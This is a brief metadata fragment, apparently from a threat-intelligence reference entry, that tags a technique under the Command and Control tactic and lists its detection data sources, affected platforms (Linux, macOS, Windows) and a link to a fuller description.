Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre